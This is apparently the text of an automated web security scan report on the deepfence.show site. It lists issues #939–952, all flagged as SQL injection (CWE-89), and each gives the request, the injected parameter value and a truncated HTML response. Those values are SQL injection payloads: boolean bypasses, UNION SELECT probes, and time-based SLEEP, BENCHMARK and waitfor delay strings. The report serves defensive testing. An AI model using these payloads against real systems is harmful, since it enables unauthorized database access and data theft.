unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #939\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin\") or \"1\"=\"1\"/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #940\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #941\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io -1' UNION SELECT 1,2,3--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #942\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io1'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #943Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io or benchmark(50000000,MD5(1))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #944\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #945\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #946\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io/*!10000 1/0 */\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #947\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io1-false\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #948\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #949\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters demouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #950\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #951\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ';waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #952\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: 